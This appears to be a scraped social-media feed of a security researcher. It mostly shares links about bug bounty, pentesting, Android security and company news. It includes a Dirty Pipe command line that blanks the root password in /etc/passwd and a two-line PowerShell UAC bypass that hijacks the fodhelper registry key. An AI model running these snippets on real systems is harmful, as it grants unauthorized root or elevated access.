Ghost_fh
@faridpy
OSCP | OSWE | Synack Red Team Member | Security Researcher | Core Pentester at Cobalt.
Any good resource(s) in JavaScript language. The point about vulnerability finding is to learn the code behind it. To understand SQL injection for example, you need to understand SQL. XSS is in fact JavaScript Injection so you must improve your JavaScript skills.
Hacked up a quick Dirty Pipe PoC that spawns a shell by hijacking (and restoring) the contents of a setuid binary. haxx.in/files/dirtypip…
Clear out the root password using CVE-2022-0847 - dirtypipe.cm4all.com ./CVE-2022-0847 /etc/passwd 1 ootz:
Microsoft Exchange Server SSRF Exploit. vanshal.medium.com/pre-auth-ssrf-… #bugbounty #infosec
Boom. Easy uXSS in any version of Firefox💥 Tools needed - Firefox, Bash and a working mind🌚 #bugbountytips #bugbounty
Looking to learn more about getting started with Android application security? Don’t forget to check out @avanish46’s in-depth introductory guide: bit.ly/3wvXbec
We are excited to announce that Cobalt is now SOC 2 Type II certified! Learn more about SOC 2 compliance and what this means for Cobalt customers in this post by our InfoSec Manager, Alex Jones. cobalt.io/blog/announcin…
If you want to get started with android application security, I have summarised all the resources in one place and blogged about it. Do give it a read and I hope you find it useful. Thanks @cobalt_io for giving me this opportunity ✌️ #android #security blog.cobalt.io/getting-starte…
We don't have to introduce you to @sqlmap by @stamparm: it's the go-to tool for detecting and exploiting SQL injection vulnerabilities. But did you know you can also use CSRF tokens and multi-threading? Check out our quick guide! 👇 blog.intigriti.com/2021/05/23/hac…
A writeup about my latest finding SSRF in PDF Renderer using SVG #ssrf #svg #bugbountytips #bugbounty pwn.vg/articles/2021-…
What goes into an effective #pentest report? For the first installment of a two-part blog series, we’ll dive into the details of vulnerability reports. Breaking down each report section, sharing examples, and tips on how to enhance your report writing: bit.ly/3oBMKm8
cobalt.io
How to Write an Effective Pentest Report | Cobalt
In a two-part blog series, we will focus on various aspects and components of writing an effective report from a pentester’s point of view.
All About Bug Bounty:- Updated. All about bug websites (bypasses, payloads, etc.) github.com/daffainfo/AllA…
Learn about the CSP security header, something that confused me for a long time 😅 blog.shiftleft.io/intro-to-the-c…
Challenge: Is this code secure? 🤔Submit your answer here by April 25th! go.shiftleft.io/developer-chal…
My small research about attacks on remote debuggers of various languages acunetix.com/blog/web-secur… #bugbountytips #Pentesting
Don't miss this expert panel of speakers, including our own @CarolineWMWong, later today! See below for details.
Tomorrow 4/22 join @wisporg & Forte Group on transitioning to privacy & security executive leadership positions. Stellar panelists include @CarolineWMWong, Kristie Chon & @lakshmihanspal. Moderated by @AlyaGennaro. RSVP here: eventbrite.com/e/a-series-tra…
[TOOL RELEASE] - 𝗦𝗶𝗺𝗽𝗹𝗲𝗛𝗧𝗧𝗣𝗦𝗲𝗿𝘃𝗲𝗿 - Go alternative of python SimpleHTTPServer ✅ TCP server with customizable response ✅ File server with an arbitrary directory ✅ File upload support ✅ HTTPS support ✅ Basic auth support github.com/projectdiscove… #opensource
UAC bypass in 2 lines:
```
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
```
cmd -> fodhelper PoC||GTFO
Hackers, we have launched a brand new CTF level on #Hacker101 to put your AWS hacking skills to the test! The flag from this level is worth 26 points and will get you an invite to one of the private programs hosted on @Hacker0x01! ctf.hacker101.com